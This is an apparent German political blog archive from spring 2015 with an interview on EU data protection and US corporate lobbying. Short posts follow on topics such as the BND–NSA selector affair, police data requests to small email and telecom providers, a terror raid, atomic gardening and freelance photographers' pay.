In den USA sind libertäre Ansichten verbreiteter als hier, besonders im Silicon Valley. Da kommen Firmen eher damit davon, wenn sie sagen, der Kunde hätte sich ja besser informieren können. Eine gute Analogie dazu sind die "EULA"-Kleingedrucktes-Lizenzen, die häufig von Software bei der Installation angezeigt werden. Nach amerikanischem Recht ist der Kunde selber Schuld, wenn er auf sowas klickt. Das deutsche Recht sagt aber: Unerwartete Einschränkungen, die man erst nach dem Kauf sehen kann, sind unwirksam. Die europäische Rechtstradition hat ja auch Konzepte wie "Sittenwidrigkeit".
Ich glaube daher, dass sich der Schutz des Kunden in Europa zwangsläufig früher oder später auch auf Datenweitergabe erstrecken muss.
Das Hauptproblem bei einer Datenschutzverordnung ist, wie man dem ganzen Regularium Biss gibt. Wenn ein europäischer User im Internet auf einer US-amerikanischen Webseite etwas klickt, wie kann ihn dann die EU-Verordnung schützen? Hier müsste man bilaterale Verträge mit den USA machen, um für Rechtssicherheit zu sorgen. Und dann blieben immer noch all die anderen Länder. Das zeichnet sich leider alles nicht ab. Im Gegenteil ist die EU bisher immer eingeknickt und hat im Zweifelsfall gegen ihre eigenen Bürger entschieden. Von Fluggastdaten bis zur SWIFT-Datenweitergabe ist die Liste hier lang.
Bei Datenweitergabe von Firmen gibt es das Konzept des "Safe Harbor". Da können sich amerikanische Firmen selbst als datenschutzkonform zertifizieren. Die versprechen einfach nebulös und nicht nachprüfbar, bei ihnen seien die Daten schon sicher. Was dann tatsächlich mit den Daten passiert, kann der Benutzer nicht prüfen, und wenn die Daten wegkommen, hat er keine realistische Handhabe.
Daher ist aus meiner Sicht das größte Risiko bei allen europäischen Datenschutzreformen, dass die uns am Ende nur auf dem Papier helfen. Die Politik ist damit zufrieden. Deren Ziel war es ja bloß, ein bisschen Aktivismus und Handlungsfähigkeit zu demonstrieren. Je weniger das den Freihandel mit den USA einschränkt, desto besser.
Für wie erfolgsversprechend hälst du die Klage von Max Schrems?
Vor Gericht und auf hoher See sind wir in Gottes Hand, wie es so schön heißt.
Ich wünsche ihm viel Erfolg, aber er kämpft letztendlich gegen Windmühlen. Das europäische Rechtssystem ist (vorsätzlich!) so ausgelegt, dass Freihandel mit den USA wichtiger ist als Datenschutzinteressen der EU-Bürger.
[Anm.: Hier hätte ich besser Architektur der EU als europäisches Rechtssystem sagen sollen]
Da kann man vielleicht mal hier und da ein Scharmützel gewinnen, aber den Krieg haben wir als Gesellschaft im Grunde schon aufgegeben.
Der NSA-Skandal hat das Gefühl der Hilflosigkeit nur noch verstärkt.
Lassen sich amerikanische Konzerne wie Facebook, deren Geschäftsmodell auf personenbezogenen Daten beruht, überhaupt regulieren?
Natürlich!
Unternehmen tun alles, was das Gesetz sie tun lässt.
Wenn man die Gesetze ändert, ändert sich auch das Verhalten von Facebook und co.
Die wollen sich ja am Ende des Tages ihr Gehalt auszahlen können, und zahlen auch Steuern, wenn das Gesetz sie zwingt. Wenn das Gesetz Schlupflöcher bietet, nutzen sie die freilich.
Als Mitarbeiter einer kriminellen Vereinigung gibt es keine Aktienoptionen. Die richten sich im Allgemeinen schon nach den Gesetzen.
Es muss aber der politische Wille dafür da sein, ordentliche Gesetze zu machen.
Julian Assange hat behauptet Google verhalte sich mehr wie eine Regierung als ein Unternehmen und Harald Welzer hat im Spiegel gesagt, wir würden längst im Totalitarismus leben ohne es zu merken. Hälst du eine Zukunft, in der Unternehmen wie Google die Politik lenken für realistisch? Wie sähe der „worst case“aus? Ein modernes 1984? Und wie könnte man sinnvoll damit umgehen?
Unternehmen wie Google lenken jetzt schon die Politik.
https://www.opensecrets.org/lobby/indusclient.php?id=B13&year=2014
Google gibt soviel für Lobbyismus aus wie die nächsten beiden (Microsoft und Facebook) zusammen.
Gerade in den USA kann man ganz gut nachvollziehen, welcher Politiker von welchem Unternehmen wie hohe Zuwendungen erhalten hat, und wofür der dann so gestimmt hat.
Die Science Fiction-Literatur beschäftigt sich seit vielen Jahren mit dem Konzept der Corporatocracy.
http://en.wikipedia.org/wiki/Corporatocracy
1984 ist da nicht der richtige Vergleich, eher Cyberpunk, sowas wie Shadowrun oder Neuromancer, oder, wenn Sie es moderner mögen, Daemon.
Können Sie sich erinnern, wann die Politik zuletzt offensichtlich im Interesse der Bürger aber gegen die Interessen der Industrie gehandelt hat?
Im Roman „The Circle“ wird eine Gesellschaft beschrieben, in Leitsprüche wie „Privacy is theft“ gelten und alles mit dem „greater good“ gerechtfertigt wird. Auch die verschiedenen Dienste und Plattformen sind in riesigen Datensammlungen über jeden einzelnen vereint. In der Realität gibt es mittlerweile Software, die es Arbeitgebern möglich macht ihre Mitarbeiter komplett zu überwachen und sogar deren zukünftiges Verhalten voraussehen zu können.Wie viel Wahrheit steckt aus deiner Sicht in einer solchen Dystopie? Kann das unsere Zukunft sein? Wie sähe sie aus?
Je nach Blickwinkel ist das keine Dystopie, das ist Praxis.
Alle großen Firmen machen zur Gefahrenabwehr Network Monitoring und erheben Metadaten über Netzwerkverkehr ihrer Benutzer. Um dem europäischen Datenschutzrecht zu genügen, wird sowas in Europa pseudonymisiert, und man denkt sich Methoden aus, wie man den Zugriff so beschränkt, dass die Daten nur im echten Notfall wieder deanonymisiert werden können.
Dinge, die in Europa selbstverständlich sind, nämlich dass ich auf dem Arbeitsplatz auch private Emails verschicken darf, und dass der Arbeitgeber die nicht einfach mitlesen darf, sind Errungenschaften unserer Rechtskultur und der Gewerkschaften. In anderen Ländern gibt es so einen Schutz nicht.
Die Gefahr ist daher bei uns weniger der Chef, der per Webcam seiner Sekretärin in den Ausschnitt guckt, als vielmehr eine diffuse Bedrohung durch Metadaten, wie bei der NSA.
Obwohl es solche Chefs sicher auch geben wird. Gerade im Einzelhandel gibt es ja flächendeckend Überwachungskameras, um Ladendiebstahl erkennen zu können.
Update: Besserer opensecrets-Link.

Tue May 5 2015

[l] Der Premierminister von Singapur hat übrigens vor Jahren einen Sudoku-Solver in C geschrieben und den Code jetzt veröffentlicht. Das ist der hier.
Übrigens, Ein Klassiker zum Thema Sudoku-Solver. Ron Jeffries (einer der drei Gründer von Extreme Programming) hat mal sowas wie Liveblogging gemacht zu seinem Versuch, einen Sudoku-Solver zu hacken. Als Vergleich dazu dient ein Blogpost von Peter Norvig, der mal eben einen geschrieben hat. Peter Norvig ist ein berühmter Hacker aus der Lisp/Ai-Welt, der auch mal bei Sun und der Nasa gearbeitet hat und jetzt Director of Research bei Google. Also mit anderen Worten: Auch ein Programmier-Experte. Der Link zu seiner Homepage scheint gerade kaputt zu sein.
Ich finde das großartig, dass der Premierminister von Singapur einen der Extreme Programming-Götter mal eben so vom Olymp gestoßen hat. :-)
[l] Ich hab ja hier häufiger Drehtür-Beiträge. Wenn ein Abgeordneter oder Regierungsmitglied nach Abschluss seiner Tätigkeit direkt in die Wirtschaft wechselt. Gelegentlich auch noch in genau dem Gebiet, in dem sie als Politiker tätig waren.
Sowas gibt es immer wieder, aber normalerweise haben die Politiker genug Anstand, um das erst nach Ende ihrer offiziellen Tätigkeit zu machen. Denn sonst riecht das ja zu offensichtlich nach Korruption.
Ich dachte bisher, dass das so ist, weil die Firmen darauf bestehen, damit es nicht aussieht, als bestächen sie Politiker. Und die Politiker müssten dann ja auch ihre Äußerungen auf die Goldwaage legen lassen. Bei jeder Äußerung im Sinne des Sugar Daddy sähe es ja sonst wie Korruption aus. Gut, Politiker werden so gut wie nie wegen Korruption belangt. Unter anderem ja, weil wir das in Deutschland immer noch nicht ordentlich unter Strafe stellen. Um unter diesen Paragraphen zu fallen, muss man tatsächlich die Stimme bei einer Wahl oder Abstimmung kaufen lassen. Und dann muss nachgewiesen werden, dass der Abgeordnete nicht aus Überzeugung so gestimmt hat, sondern weil Geld floss. In der Praxis passiert es nicht.
Warum ich das alles hier so ausrolle? Weil ich Christopher Lauer gegenüber meinem Dank und meiner Bewunderung Ausdruck verleihen will. Nicht nur arbeitet der jetzt für Axel Springer, während er noch im Parlament sitzt und an Abstimmungen teilnimmt!, sondern er fühlt sich auch überhaupt nicht an Regeln von Anstand und Ehre gebunden und versucht es nicht so aussehen zu lassen, als sei das Korruption.
Damit hat er nicht nur den Beweis erbraucht, dass es die Politiker und nicht die Firmen sind, die hier sowas wie einen moralischen Kompass (oder zumindest ein Gefühl für schlechte PR) haben, und keine Kohle für direkte Beraterverträge annehmen wollen, solange sie noch aktives Mitglied des Parlaments sind. Dafür sollten wir ihm dankbar sein. Da hat er wirklich zur Wahrheitsfindung und zum Erkenntnisgewinn beigetragen.
Und auch wie er dann inhaltlich sofort eine 180°-Wendung gemacht hat, das war berauschend. Der hat nicht mal versucht, den Eindruck zu vermeiden, als sei er käuflich! Er hat sogar gleich das Plansoll übererfüllt und von "Industriespionage" gesprochen (seitens Google gegen die Verlage, versteht sich). Wie geil! Damit hat er Springer zu sich hinab in das Schlammloch gezogen. Deren Position kann doch jetzt niemand mehr ernst nehmen. Gut, konnte man auch vorher nicht. Aber jetzt ist es noch klarer.
Für das alles, lieber Christopher, gebührt dir mein Dank. Es war gut, dass das mal jemand gemacht hat. Unter Aufopferung seiner eigenen Glaubwürdigkeit. Jemand, dem seine Karriere so wenig wert war, dass er sich für uns alle auf diese Granate geworfen hat.
Seine Karriere musste sterben, damit wir leben können!
[l] Die aktuelle Folge der Anstalt lohnt sich mal wieder (bin selbst noch nicht ganz durch). Diesmal geht es um Feminismus — aber guckt die Folge trotzdem!1!! :-)
Mir haben einige Leute gemailt, dass in der Folge der Bechdel-Test erwähnt wird, von dem sie noch nie gehört haben. Nun, äh, … 2010 in diesem Blog! *sonn*
Besonders schön an der Folge finde ich, dass sie nicht einfach mit dem Finger auf andere Zeigen, sondern ihre Punkte an sich selbst illustrieren.

Sat May 2 2015

[l] Guckt mal, was die Cops bei den Gartenteichterroristen gefunden haben. Ich zitiere mal:
Sicherheitskräfte entdeckten eine funktionsfähige Rohrbombe, dazu unter anderem Bauteile eines Sturmgewehres G3, 100 Schuss Munition vom Kaliber neun Millimeter, ein Übungsgeschoss für eine Panzerfaust, drei Flaschen mit Wasserstoffperoxid, Brennspiritus. Nach Informationen von SPIEGEL ONLINE wurden auch "Schriften mit Bezug zum konservativen Islam" gefunden - dazu machten die Sicherheitsbehörden am Donnerstag keine Angaben.
OK, also mal der Reihe nach. Nicht ein Gewehr haben sie gefunden, sondern Bauteile eines Gewehrs. Bauteile. Sie sagen noch nicht mal, dass das ein vollständiger Set Bauteile war!
Dann 100 Schuss 9mm Munition. Die passen nicht in ein G3. Nicht mal annähernd. Ist das andere Ende des Spektrums, das ist für leichte Pistölchen.
Panzerfaust klingt gruselig, aber sie haben keine Panzerfaust gefunden, sondern ein Übungsgeschoss. Wie sie so ein Übungsgeschoss aus? Das ist ein Stück angemaltes Metall. Ohne Sprengstoff drin. Kann man sich im Internet für 10 Euro klicken.
Meine Zusammenfassung wäre also: Hahahaha, sonst habt ihr nichts gefunden?! Das war alles!?
Die Zusammenfassung der Behörden, die da jetzt recht belämmert darstehen, weil sie bei diesen Leuten überhaupt eine Durchsuchung durchgeführt haben:
Auf einer Pressekonferenz sagten sie jedoch, dass die Funde eindeutig darauf hindeuteten, "dass das Geschehen dem islamistisch-extremistischen Spektrum zuzuordnen ist".
Äh … ach? Warum genau? Weil wir sonst zugeben müssten, hysterisch bei anders aussehenden Menschen mit anderen Religionen Durchsuchungen durchzuführen, und dann nicht mal was finden.
Oh, aber warte, da war ja auch noch die Rohrbombe! Leider gibt es von der kein Bild. Hmm. Ja, warum eigentlich nicht? Weil man sonst sehen könnte, dass das eher Feuerwerk als eine Bombe ist? War da überhaupt Sprengstoff drin oder war das nur ein Rohr und das Wasserstoffperoxid sollte zum Sprengstoff werden?
Wie macht man überhaupt aus Wasserstoffperoxid Bomben? Ist das realistisch? Nun, das Szenario hatte ich vor ein paar Jahren schon mal im Blog, als es noch um die Bahn-Bomber ging, die ja auch mysteriöse glücklicherweise vor ihrem monströsen, immensen, das ganze Land in Schutt und Asche legenden Anschlag auf die Deutsche Bahn gefasst werden konnten!1!! Die Links von damals sind inzwischen leider tot. Aber da war noch etwas mehr.
[l] Elon Musk hat heute eine neue Batterie-Technologie vorgestellt. Es gibt noch keine Specs, aber guckt euch mal die Keynote an. Kein sonderlich dynamischer Sprecher, aber das hat mir persönlich echt Hoffnung gemacht. Besonders das Bild von dieser Gigafactory, die dann mit Solarenergie betrieben wird.
Und die Patente sollen alle Open Source werden.

Fri May 1 2015

[l] Wisst ihr, was wir lange nicht mehr hatten? Was wir jetzt mal so richtig zur Einnordnung brauchen? Einen richtig langen Bahnstreik!
Uns ist klar, dass das Zugpersonal die Nase schon lange gestrichen voll hat. Zu Recht hat es Druck gemacht und längere Streiks gefordert. Nun denn – diesmal wird es richtig lange!

Tue Apr 28 2015

[l] Habt ihr schonmal von Atomic Gardening gehört?
Nicht?
Wikipedia hat schön den historischen Hintergrund mit "Atoms for peace". Da findet man dann auch so tolle Bilder wie dieses hier. Das Konzept ist schnell erklärt. Man pflanzt um eine radioaktive Strahlungsquelle herum und guckt dann mal, was für Mutationen so kommen.
Darauf aufmerksam gemacht hat mich diese Einsendung hier:
Ich arbeite jetzt seit Ende letzten Jahres (als Software-Entwickler) in einem Institut für Pflanzenwissenschaften. Da wir da auch GVOs haben und S1 Labore muss da jeder eine Schulung mitmachen wie mit diesen umzugehen ist. Dabei wurde nebenbei erwähnt, dass man auch um GVO-Verordnungen herumarbeiten kann, indem man Atomic Gardening betreibt. Da werden dann halt nicht gezielt irgendwelche Gene verändert, sondern die zu verändernden Pflanzen werden in verschiedenen Abständen zu einer radioaktiven Strahlungsquelle gepflanzt und dann wird einfach abgewartet. Wenn einer der Mutanten dann interessante Eigenschaften hat, kann man diesen dann normal weiter züchten. Da muss auch nichts deklariert werden oder so, das gilt als "natürlich" entstandener Genotyp. Einige unserer heutigen Nutzpflanzen sind wohl so entstanden und das wird wohl auch noch immer gemacht, vor allem wohl in Japan (damit meine ich jetzt nicht Fukushima).
Dieser Link hängte noch an. (Danke, Jarno)

Mon Apr 27 2015

[l] Mir hat ein Jurist mal die tatsächliche Rechtsgrundlage für Auslandseinsätze der Bundeswehr gemailt. Ich zitiere:
Das Bundesverfassungsgericht hat die Rechtsgrundlage der Bundeswehr in out-of-area Fällen in Art. 24 GG verortet. Die Leitentscheidung des Gerichts, die das erstmals erwähnt hat („erfunden hat“) ist im 90. Band (verfügbar etwa unter: http://www.servat.unibe.ch/dfr/bv090286.html). Die verfassungsrechtliche Idee des Gerichts war: Wenn man sich - so der Inhalt von Art. 24 GG - als Bundesrepublik Deutschland an internationalen Organisationen beteiligen darf, die ihrerseits militärische Operationen durchführen (zB UNO, später auch die NATO), dann ermächtigt das Grundgesetz damit auch implizit zu out-of-area Einsätzen der Bundeswehr.
Ob das zwingend ist, diese implizite Annahme zu unterstellen, kann man bezweifeln. Jedenfalls sagt unser Verfassungsgericht das. Die Bundeswehr sollte also auch Art. 24 GG zitieren. Oder Du machst die „richtige Rechtsgrundlage“ zumindest in Deinem Blog bekannt?
Mach ich doch glatt! (Danke, Karsten)
[l] Eines der für mich faszinierensten Themen ist, wie Menschen mit Schuld umgehen. Nehmt nur mal diesen Fall hier. Eine australische Gesundheits-Bloggerin, die in ihrem Blog beschrieben hat, wie sie mit gesunder Diät ihren Krebs besiegt hat. Die hat einen Buch-Deal gekriegt, mehrere 100k$ Spenden, Apple hat sich nach Cupertino eingeladen (sie hat auch eine populäre App aus ihrem Diät-Krams gemacht), … und dann kam raus, dass sie eher an Unehrlichkeit als an Krebs leitet. Alles erstunken und erlogen. Die Kohle weg. Der Buchdeal ist dann natürlich auch geplatzt, die App ist nicht mehr im App Store. Gute Gelegenheit für ein bisschen Selbstreflektion, würde man denken. Und was hat sie zu sagen?
"I just think [speaking out] was the responsible thing to do. Above anything, I would like people to say, 'Okay, she’s human. She’s obviously had a big life. She’s respectfully come to the table and said what she’s needed to say, and now it’s time for her to grow and heal.'"
Mit anderen Worten: Sie sieht sich hier noch als Heldin der Geschichte. Das war ja bloß menschlich, und schaut her, ich bin hergekommen und habe gestanden! Jetzt muss ich erwachsener werden und heilen.
Ja, heilen! Sagt die Frau, die mit falschen Krebsansagen hunderttausende von Dollars an Spenden … ja was sagt man da, hinterzogen hat?
Die Polizei hat sich übrigens entschieden, nicht zu ermitteln.
Man stelle sich mal vor, Bernie Madoff stellt sich vor Gericht hin und sagt: schaut her, ich habe gestanden, jetzt ist es Zeit für mich, erwachsen zu werden und zu heilen.
WTF?

Fri Apr 24 2015

[l] Vattenfall hat anscheinend die Schnauze voll von dem Stress mit der Braunkohle in der Lausitz, steigt auf 100% erneuerbare Energien um. Nanu? Auch keine Atomkraft mehr? Gut, nach Meldungen wie diesen hätte ich da ja auch keinen Bock mehr.
Update: Vattenfall zeigt sich verärgert über diesen gut gemachten Medienfake. Wie unsportlich, da hätten sie doch wenigstens ein bisschen mitspielen können. Sowas wie "Wir machen nur noch kurz die Braunkohle alle, dann 100% erneuerbar" oder so. Wie humorlos. Schönen Gruß an der Stelle übrigens an das Peng!-Kollektiv. (Danke, Hannes)

Thu Apr 23 2015

[l] Wisst ihr, wie die Amis ihre Industriespionage gegen EADS und Eurocopter und ihre Spionage gegen französische Behörden machen?
Sie lassen es die ~~Arschkriecher~~ guten Freunde vom BND machen!
Mindestens seit dem Jahr 2008 fiel BND-Mitarbeitern mehrfach auf, dass einige dieser Selektoren dem Aufgabenprofil des deutschen Auslandsgeheimdienstes zuwiderlaufen - und auch nicht von dem "Memorandum of Agreement" abgedeckt sind, das die Deutschen und die Amerikaner zur gemeinsamen Bekämpfung des globalen Terrorismus 2002 ausgehandelt hatten. Stattdessen suchte die NSA gezielt nach Informationen etwa über den Rüstungskonzern EADS, Eurocopter oder französische Behörden. Der BND nahm das offenbar jedoch nicht zum Anlass, die Selektorenliste systematisch zu überprüfen.
Ja wie, natürlich nicht! Denken schmerzt! Das lassen wir lieber unsere transatlantischen Freunde machen!
Wenn ich daran denke, wie wir im Westen uns damals über die DDR lustig gemacht haben, weil von den Russen immer demonstrativ als ihren Freunden gesprochen haben. Dabei war das doch völlig offensichtlich eine Besatzungsmacht, die walten und schalten konnte, wie sie wollte. Eher sowas wie Hausherr und Bediensteter. Dabei war und ist das bei uns genau so, eher noch schmieriger.

Wed Apr 22 2015

[l] Hier geht gerade die Empfehlung ein, sich mal die Kommentare zur Änderung der Störungshaftung anzugucken. Ich weiß nicht, ob es da eine Übersichtsseite gibt, aber man kann bei bmwi.de nach wlan suchen und findet dann PDFs.
Da sind dann so Kommentare dabei wie von "Waldorf-Frommer", einer durch Filesharing-Abmahnungen bekannt geworden Anwaltskanzlei. Die sind wenig überraschend unzufrieden damit, dass der Entwurf nicht faschistisch genug ist.
Dann gibt es da den Bundesverband der Dienstleistungswirtschaft, die gerne zusätzlich noch verboten hätten, dass Firmen auf Webseitung Werbung schalten, "die im Wesentlichen der Verbreitung illegaler Inhalte dienen" (Glücksspiel wird explizit erwähnt). Die GEMA hätte gerne alle Provider mal so richtig kriminalisiert. Aber das absolute Highlight ist Diese Stellungnahme von Eifel-Net, die den Fortbestand der Bundesrepublik Deutschland in Gefahr wähnt.
Die Übersichtsseite wird nachgereicht, sobald ich sie finde.
Update: Hier ist die Übersichtsseite. (Danke, Fukami)

Tue Apr 21 2015

[l] Zu der Frage, ob das Sexualstrafrecht bei uns zu lasch ist, kommt hier noch ein Nachzügler:
am Wochenende erzählte mit eine Freundin folgende Geschichte:
Sie hat ein Nachhilfeinstitut, recht neu aufgemacht.
Die einzelnen Zimmer haben Glastüren.
Jetzt kam sie auf die Idee, es würde schon ablenken wenn draußen Leute hin und her gehen und hat Milchglasfolie besorgt. Sie informierte einen ihrer Nachhilfelehrer, daß sie die jetzt anbringen will.
Der meinte dazu:
"Mach das bloß nicht! Ich müßte dann immer die Tür auflassen!"
So, jetzt rate mal wieso?
Wenn er mit einer Schülerin alleine im Raum ist, ist er unter permanenter Gefahr am Ende irgendwelchen Vorwürfen ausgesetzt zu sein. Deswegen ist es grad gut so, daß jeder reingucken kann.
In der Schule dürfen die Lehrer Schülerinnen nur noch nachsitzen lassen, wenn immer zwei Lehrer im Raum sind.
Es haben sich zu viele schnucklige Referendare, die die Avancen pubertierender Schülerinnen abgeschlagen haben, nachher Rachevorwürfen gegenüber gesehen.
[l] Noch ein Kommentar zu den polizeilichen Datenabfragen:
Bestandsdaten-Anfragen:
Für den Abruf der Bestandsdaten gibt es kein einheitliches Formular. Teilweise sind es einfache Freitexte, wo Behörden nach § 112, 113 TKG I.V.m §100j StPO ein Auskunftsersuchen stellen. Die Anfragen kommen per Fax, Brief und Mail als Text, PDF und Word Dokument(!) rein.
Da die Echtheit der Mails nicht geprüft werden kann, wird auf ein unterschriebenes Fax bestanden (Digitale Signatur? undenkbar).
Wenn man neu in diesem Bereich ist, hält man die Anfragen teilweise für Fälschungen. Nachfragen bei der Polizei bestätigen aber die Echtheit.
Obwohl unsere Bestandsdaten nicht verifiziert sind (kostenloser Dienst, viele Fakes), kassieren wir über 16€ vom Staat für die Auskunft, was ich sehr bedenklich finde (einige Bundesländer zahlen weniger).
TKÜ-Maßnahmen:
Nach gerichtlicher Anordnung, kommt es vor, dass ein E-Mail Postfach gespiegelt werden soll.
Wir haben keine SINA Box, deswegen sollen die Mails einfach zu einer anderen Adresse gespiegelt werden. Manchmal muss man bei der DENIC nachschauen, ob die Domain wirklich der Polizei gehört / sich das bestätigen lassen.
Es gab Fälle wie: "Bitte spiegelt die Mails auf folgende GMX Adresse". - Ja, das war eine echte Anfrage.
Mittlerweile spiegeln wir aber nur noch intern und nicht auf externe Adressen.
Das mit der externen Spiegelung wird in manchen Bundesländern nicht mehr gemacht. Da gab es wohl mal einen Aufall des Mailserver und die Bounce Mails gingen dann an die Absender der Mails zurück…
PGP:
Beim senden von sensiblen Daten ist PGP beim LKA optional. Beim BKA ist PGP teilweise Pflicht.
Begründung: Sonst sagt der Verteidiger - Wenn die Daten unverschlüsselt übertragen wurden, wie wurde sichergestellt, dass die Daten nicht manipuliert wurden?
Header Verifizierung:
Wir wurden noch nie von Behörden gefragt, ob wir einen E-Mail Header verifizieren können bzw die Echtheit des Mail versandes über unsere Server bestätigen können.
Wie es zu Bestandsdaten-Abfragen kommt:
Eine Bestandsdatenanfrage bedeutet nicht, dass der E-Mail Account etwas böses getan hat. Man muss keine Mails versendet haben. Es reicht, wenn die Betroffene E-Mail irgendwo erwähnt wurde und somit als "Täter" in Frage kommt.
Beispiel: Es wird online Ware bestellt und die E-Mail Adresse wurde dabei angegeben.
Sonstige Probleme:
Bei den Behörden-Anfragen liegt teilweise eine Begründung bei, mit der man ahnen kann, was in manchen Postfächern liegt. Diese Inhalte will man nicht auf seinen Servern haben. Da ein Ermittlungsverfahren gegen den Postfach-Besitzer läuft, darf man diesen verständlicherweise nicht warnen. Das heißt aber auch, dass man die Daten nicht löschen darf. Leider bekommen wir keine Benachrichtigung, wann das Verfahren abgeschlossen ist. Somit muss man einige Zeit lang üble Inhalte dulden.
Postfach-Beschlagnahmung:
Nach Gerichtlicher Anordnung ist man verpflichtet, die Inhalte des Postfaches den Behörden zu übergaben. Die Daten möchte gerne direkt vom Server an die Behörden senden. Leider haben die Behörden keinen SFTP oder sonstige Art von Upload. Mit ganz viel Glück kann man große E-Mails senden. Somit heißt es: Daten runterladen, auf CD brennen und zur Post gehen.
Update: Dazu ging noch ein Kommentar von einem Admin bei einer Polizeibehörde ein:
„…Die Daten möchte gerne direkt vom Server an die Behörden senden. Leider haben die Behörden keinen SFTP oder sonstige Art von Upload. Mit ganz viel Glück kann man große E-Mails senden. …“
Diese Mails bleiben regelmäßig an der Firewall hängen weil zu groß, zu suspekt, whatever. Und nachdem man sie dann über Umwege doch zugestellt gekriegt hat, wird man als Admin gefragt „Was ist ein .tar.gz, womit macht man das auf?“.
[l] Ein anderer Fotograf schreibt:
ich arbeite hauptsächlich als Biologe aber verkaufe auch ab und an Fotos. Nachdem es in Deinem Blog jetzt so klingt, dass man da immer nur Minipreise bekommt ein paar Beispiele aus meiner Erfahrung:
- Archivfotos von meiner Festplatte von Tieren für eine Infotafel am Bodensee (Nicht exklusive Nutzung): 80€ pro Bild.
- Ein Freund von mir hat einen seltenen Vogel fotografiert für den sich eine Bildagentur interessierte. Er hat das Foto nur aus Interesse und als Beleg der Sichtung gemacht. Bekommen hat er (exklusive Nutzung mit Übertretung aller Rechte) 1600€
- Ein gutes Luftbild für ein Buchcover vom Bodensee (Auftrag inkl. nötigem Heliflug): 2500€
- Ein weiterer Kollege hat ein sehr gutes Foto von Flamingos am Bodensee gemacht. Das war im Herbst ein beliebtes Thema. Wurde wieder einer Fotoagentur angeboten (Übertragung der Rechte): 600€
- Luftaufnahmen von Gewässern vom Helikopter aus (Auftragsarbeit): 155CHF Stundensatz für Aufnahmen und Nachbereitung.
- Zeitungen fragen regelmässig nach Bildern von Tieren an und wollen die umsonst. Für kommerzielle Nutzung verlangen wir aber immer mindestens die 80€. In so 75% der Fälle hören wir nie wieder was. In den restlichen wird brav bezahlt.
Wer Fotos für einen bestimmten Zweck macht kann sehr wohl ausreichend vergütet werden. Zeitungen stellen sich da gerne quer. In meinen Augen ist es auch lukrativer ein für Zeitungen relevantes Foto einer Agentur ganz zu verkaufen. Dann sieht die Summe gleich viel netter aus
Wenn jemand jetzt auf einer Veranstaltung OHNE AUFTRAG langwierig Fotos macht und hofft, dass ihm irgendjemand den gesamten Aufwand bezahlt - der muss Angelina Jolie mit Baby fotografiert haben. Aber das ist ein ganz anderer Marktbereich. Generell ist der Markt mit Fotografie von trivialen Dingen massiv übersättigt. Wie der gesamte Medienbereich. Das drückt die Preise und macht alles natürlich schwierig. Gerade bei Zeitungen ist das alles ein Drama, aber so schlimm wie bei dir berichtet wirklich nicht immer.
[l] Was glaubt ihr eigentlich, was so ein professioneller Fotograf verdient, wenn eine Zeitung wie die FAZ in einem ihrer Artikel eines seiner Bilder bringt?
Na? So nen Hunni vielleicht?
Ich meine, man hat ja auch Equipment-Kosten, und Reisekosten, Nachbearbeitung, verliert nen Tag pro Shoot, … damit sich das lohnt, müsste da ja schon was zusammenkommen, richtig?
Mir hat mal einer ein paar Zahlen gemailt.
Das Bild verlinke ich jetzt hier nicht, weil sonst klar wäre, wer das ist. Es war ein Foto eines Models vor einem Hintergrund einer Veranstaltung mit Firmenlogo. So wie wenn bei Filmpremieren die Schauspieler gefilmt werden etwa.
Der Kontext war irgendein Promi-Bullshit mit irgendwelchen Royals, who cares.
Der gute Mann schreibt mir:
>Ich habe die Dame auf der [zensiert] im Januar (!) fotografiert. Erst jetzt (Ende April) bekomme ich das bezahlt. Faz.net hat damals über dpa picture alliance das Foto gebucht, was picture alliance von meiner Agentur (will ich nicht sagen, weltweit bekannt, gute agentur) eingespeist wurde.
Auf der Abrechnung steht ohne Witz 1.05 Euro. Ein Euro und fünf Cent.
dahinter stehen ca. 4 Stunden Arbeit vor Ort sowie weitere 7 Stunden Nachtarbeit (Bildbearbeitung). Gebucht wurde dann nur das.
Ich möchte den jetzt nicht als Whistleblower angreifbar machen. Die dpa picture alliance ist sicher keine besonders unseriöse Organisation in der Beziehung, und von der FAZ sagt man, sie zahle für ihre Inhalte überdurchschnittlich viel (auch wenn der Durchschnitt über die Jahre branchweit stark gefallen ist und das nicht mehr viel heißt).
Ich habe dann nochmal nachgehakt, ob er weiß, wer da die Kohle abgreift auf dem Weg. Es stellt sich raus, dass es da Pauschalverträge gibt, bei denen pro Bild je nach Abnehmer deutlich unter zehn Euro gezahlt wird. Aber weil die so viel abnehmen, sehen sich halt alle genötigt, da mitzuspielen. Dann greift seine Agentur 50% ab, und das sei alles andere als unfair im Vergleich.
Nur mal so als Realitätsabgleich. Und ich dachte, die freien Journalisten würden alle über den Tisch gezogen. Aber im Vergleich zu den Fotografen haben die ja geradezu ein güldenes Leben! Au weia ist das alles schlimm.
Update: Der Fotograf weist noch darauf hin, dass das ein Ausreißer nach unten war, aber leider kein sonderlich großer.
[l] Wollt ihr mal sehen, wie ein polizeiliches Auskunfsersuchen an eine Telco so aussieht? Wohlgemerkt: Bei einer kleinen Telco. Große Telcos haben einen maschinellen Zugang, da sieht die Telco dann gar nicht mehr, wer da jetzt konkret abgefragt wird. Kleine Telcos kriegen die Anfragen dann einzeln rein, und müssen die manuell bearbeiten.
Nun arbeite ich nicht bei einer Telco und weiß daher nicht, wie so ein Dokument aussieht, daher kann ich zu der Echtheit des mir vorhin in der Fußgängerzone von einem Passanten auf einem USB-Stick in die Tasche geschmuggelten Materials hier auch nur Vermutungen anstellen.
Neugierig? Na dann: Seite 1, Seite 2. Beachtet den tollen Abschnitt auf Seite 2, wieso für diese Anfrage jetzt keine richterliche Genehmigung notwendig war. Alles schön zum Ankreuzen, damit sich da bloß kein Polizist beim Begründen überarbeitet.
Insgesamt stellt sich weniger deutlich als erwünscht der Eindruck ein, dass hier ordentlich ermittelt wird, und die nicht einfach nach Gusto solche Anfragen rauskloppen. Besonders in den automatisierten Ausbaustufen fällt mir die Vorstellung sehr schwer, dass da nicht ein paar Beamte bei Bedarf eher ein paar mehr Lookups machen als nötig.
Wenn das ein Fake ist, ist es ein gut gemachter Fake. Und er deckt alle Klischees ab.
Update: Ihr werdet euch vielleicht fragen, wieso da nichts angekreuzt ist auf Seite 2 unter "warum kein Richter das abnicken muss". Das liegt daran, dass sie nur Namen und Geburtsdatum abfragen. Das darf die die Polizei frei abfragen. Und nicht nur die Polizei. Auch die Bundesnetzagentur. Und die Ordnungsämter. Ja! Die Ordnungsämter!
